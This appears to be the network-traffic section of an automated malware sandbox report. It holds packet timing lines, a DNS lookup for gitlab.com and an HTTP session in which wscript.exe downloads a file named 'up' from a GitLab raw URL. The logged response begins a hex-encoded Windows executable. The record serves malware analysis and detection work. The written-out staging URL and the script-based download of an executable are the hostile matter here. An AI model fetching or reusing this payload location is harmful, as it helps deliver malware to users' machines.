      Jan 14, 2025 15:42:13.172501087 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.223231077 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.223257065 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.223337889 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.223368883 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.223387957 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.223422050 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.223536968 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.223551035 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.223561049 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.223567009 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.223588943 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.223884106 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.223906040 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.223911047 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.223918915 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.223939896 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.224107981 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.224126101 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.224131107 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.224138021 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.224155903 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.224214077 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.224235058 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.224240065 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.224247932 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.224266052 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.224299908 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.224419117 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.224435091 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.224983931 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.224989891 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.225130081 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.264966965 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.264988899 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.265089989 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.265109062 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.265223026 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.315917015 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.315938950 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.316061020 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.316076040 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.316121101 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.316359997 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.316378117 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.316441059 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.316447020 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.316462040 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.316730022 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.316751957 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.316812992 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.316828012 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.316838980 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.316893101 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.317327023 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.317343950 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.317398071 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.317425966 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.317431927 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.317459106 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.317459106 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.317492008 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.317497015 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.317526102 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.317584991 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.318245888 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.318264008 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.318368912 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.318373919 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.318430901 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.357199907 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.357223988 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.357355118 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.357355118 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.357369900 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.357551098 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.408392906 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.408504963 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.408528090 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.408613920 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.408615112 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.408628941 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.408801079 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.408828020 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.408848047 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.408890009 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.408912897 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.408924103 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.408940077 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.408950090 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.408958912 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.408992052 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.409001112 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.409024954 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.409157991 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.409328938 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.409347057 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.409415007 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.409415007 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.409424067 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.409465075 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.410410881 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.410434008 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.410600901 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.410608053 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.410742044 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.449357986 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.449377060 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.449490070 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.449502945 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.449551105 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.500833988 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.500859976 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.500907898 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.500938892 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.500958920 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.501008034 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.501152992 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.501815081 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.501833916 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.501913071 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.501923084 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.501971006 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.501985073 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.502006054 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.502069950 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.502077103 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.502115965 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.502212048 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.502226114 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.502263069 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.502269030 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.502299070 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.502340078 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.502438068 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.502465010 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.502525091 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.502531052 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.502547026 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.502809048 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.503223896 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.503240108 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.503350019 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.503359079 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.503403902 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.541919947 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.541940928 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.542100906 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.542120934 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.542165041 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.593256950 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.593288898 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.593338966 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.593365908 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.593389988 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.593425989 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.593487978 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.594198942 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.594212055 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.594280958 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.594290972 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.594343901 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.594394922 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.594408035 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.594456911 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.594463110 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.594506979 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.594651937 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.594666958 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.594731092 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.594734907 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.594775915 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.594805002 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.594818115 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.594963074 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.594969034 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.595146894 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.595843077 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.595859051 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.595940113 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.595940113 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.595947981 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.596074104 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.634341002 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.634358883 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.634439945 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.634457111 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.634501934 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.686121941 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.686146975 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.686203003 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.686220884 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.686239004 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.686270952 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.686454058 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.686469078 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.686517954 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.686526060 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.686566114 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.687011003 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.687026978 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.687129021 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.687135935 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.687180996 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.687601089 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.687624931 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.687688112 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.687693119 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.687722921 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.687757015 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.687967062 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.687989950 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.688035965 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.688044071 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.688067913 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.688133955 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.688390970 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.688415051 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.688471079 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.688476086 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.688500881 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.688524008 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.688765049 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.688798904 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.688827991 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.688832998 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.688857079 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.688879013 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.900907040 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.900933981 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.900985956 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.901002884 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.901038885 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.901057005 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.901273012 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.901289940 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.901354074 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.901359081 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.901434898 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.901460886 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.901490927 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.901494980 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.901520014 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.901546955 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.901667118 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.901681900 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.901731968 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.901736021 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.901771069 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.901854992 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.901868105 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.901921988 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.901926041 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.901963949 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.902085066 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.902098894 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.902148962 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.902153969 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.902200937 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.902236938 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.902252913 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.902298927 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.902302027 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.902347088 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.902353048 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.902369022 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.902417898 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.902421951 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.902457952 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.902601957 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.902616024 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.902659893 CET49742443192.168.2.4172.65.251.78
      Jan 14, 2025 15:42:13.902662992 CET44349742172.65.251.78192.168.2.4
      Jan 14, 2025 15:42:13.902698040 CET49742443192.168.2.4172.65.251.78
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Jan 14, 2025 15:42:09.103715897 CET192.168.2.41.1.1.10x3a62Standard query (0)gitlab.comA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Jan 14, 2025 15:42:09.110388994 CET1.1.1.1192.168.2.40x3a62No error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.449742172.65.251.784437436C:\Windows\SysWOW64\wscript.exe
      TimestampBytes transferredDirectionData
      2025-01-14 14:42:09 UTC327OUTGET /app8490744/updatesa/-/raw/main/up HTTP/1.1
      Accept: */*
      Accept-Language: en-ch
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
      Host: gitlab.com
      Connection: Keep-Alive
      2025-01-14 14:42:10 UTC457INHTTP/1.1 200 OK
      Date: Tue, 14 Jan 2025 14:42:09 GMT
      Content-Type: text/plain; charset=utf-8
      Content-Length: 78347968
      Connection: close
      CF-Ray: 901e641aed351a2c-EWR
      CF-Cache-Status: MISS
      Accept-Ranges: bytes
      Cache-Control: max-age=60, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
      Content-Disposition: inline
      ETag: "10f836507cd97c5afcfd16e3634fea62"
      Strict-Transport-Security: max-age=31536000
      Vary: Accept
      2025-01-14 14:42:10 UTC2134INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
      Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
      2025-01-14 14:42:10 UTC496INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 47 62 63 59 31 55 6d 67 47 56 6e 67 37 4a 6c 58 38 48 66 41 70 68 35 31 75 37 46 52 6e 71 53 78 39 35 66 35 6e 32 77 6f 35 68 44 63 51 41 59 35 50 39 32 59 64 46 36 34 56 31 33 5a 52 64 4f 6d 4f 78 68 59 25 32 42 6a 57 78 68 41 6e 34 68 67 4d 5a 4c 31 53 66 32 76 4e 51 38 79 6f 57 6c 42 52 56 55 6e 61 35 66 69 4b 43 53 32 74 65 42 32 52 51 6f 4e 58 45 36 33 5a 39 65 61 67 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75
      Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GbcY1UmgGVng7JlX8HfAph51u7FRnqSx95f5n2wo5hDcQAY5P92YdF64V13ZRdOmOxhY%2BjWxhAn4hgMZL1Sf2vNQ8yoWlBRVUna5fiKCS2teB2RQoNXE63Z9eag%3D"}],"group":"cf-nel","max_age":604800}NEL: {"su
      2025-01-14 14:42:10 UTC1369INData Raw: 34 64 35 61 39 30 30 30 30 33 30 30 30 30 30 30 30 34 30 30 30 30 30 30 66 66 66 66 30 30 30 30 62 38 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 31 30 30 30 30 30 65 31 66 62 61 30 65 30 30 62 34 30 39 63 64 32 31 62 38 30 31 34 63 63 64 32 31 35 34 36 38 36 39 37 33 32 30 37 30 37 32 36 66 36 37 37 32 36 31 36 64 32 30 36 33 36 31 36 65 36 65 36 66 37 34 32 30 36 32 36 35 32 30 37 32 37 35 36 65 32 30 36 39 36 65 32 30 34 34 34 66 35 33 32 30 36 64 36 66 36 34 36 35 32 65 30 64 30 64 30 61 32 34 30 30 30 30 30 30 30 30 30 30 30 30 30
      Data Ascii: 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a240000000000000
      2025-01-14 14:42:10 UTC1369INData Raw: 34 36 31 30 30 30 30 66 63 36 30 30 33 30 30 30 30 61 30 37 62 30 30 30 30 36 32 30 33 30 30 30 30 30 63 37 61 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 34 30 32 65 36 34 36 39 36 34 36 31 37 34 30 30 30 30 33 38 30 30 30 30 30 30 30 30 31 30 37 66 30 30 30 30 30 32 30 30 30 30 30 30 36 65 37 64 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 63 30 35 33 36 35 36 33 37 34 36 39 36 66 36 65 30 30 30 38 30 30 30 30 30 30 30 30 32 30 37 66 30 30 30 30 30 32 30 30 30 30 30 30 37 30 37 64 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 34 30 30 30 30 30 63 30 35 66 35 32 34 34 34 31 35 34 34 31 30 30 30 30 30 38 33 32 30 31 30 30
      Data Ascii: 4610000fc60030000a07b0000620300000c7a00000000000000000000000000400000402e646964617400003800000000107f0000020000006e7d00000000000000000000000000400000c053656374696f6e000800000000207f000002000000707d00000000000000000000000000400000c05f5244415441000008320100
